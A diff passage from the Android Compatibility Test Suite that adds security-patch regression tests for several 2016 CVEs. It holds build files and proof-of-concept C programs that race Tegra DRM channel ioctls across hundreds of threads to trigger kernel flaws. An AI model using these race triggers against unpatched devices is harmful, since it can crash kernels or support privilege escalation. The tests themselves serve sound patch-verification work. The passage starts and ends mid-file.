+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ puts("ran 2");
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
new file mode 100644
index 0000000..03b7b87
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6732
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
new file mode 100644
index 0000000..5b8ea8e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define THREAD_NUM 900
+#define TRY_TIMES 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret){
+ }else{
+ }
+ /* close */
+ close_c.context = open_c.context;
+
+ /* swtich to child */
+ usleep(500);
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
new file mode 100644
index 0000000..7b02188
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6733
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
new file mode 100644
index 0000000..1c1dde9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
new file mode 100644
index 0000000..7980fc9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+#define THREAD_NUM 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = THREAD_NUM, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ printf("[+] open failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ /* close */
+ close_c.context = open_c.context;
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ if(ret){
+ }else{
+ open_c.context = 0UL;
+ }
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
new file mode 100644
index 0000000..e1eebbd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6734
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
new file mode 100644
index 0000000..60b3a3c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
@@ -0,0 +1,161 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_START_KEEPON 0x10
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_START_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_START_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_START_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
new file mode 100644
index 0000000..8935cd6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6735
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
new file mode 100644
index 0000000..f38f411
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
@@ -0,0 +1,160 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_STOP_KEEPON 0x11
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_STOP_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_STOP_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_STOP_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
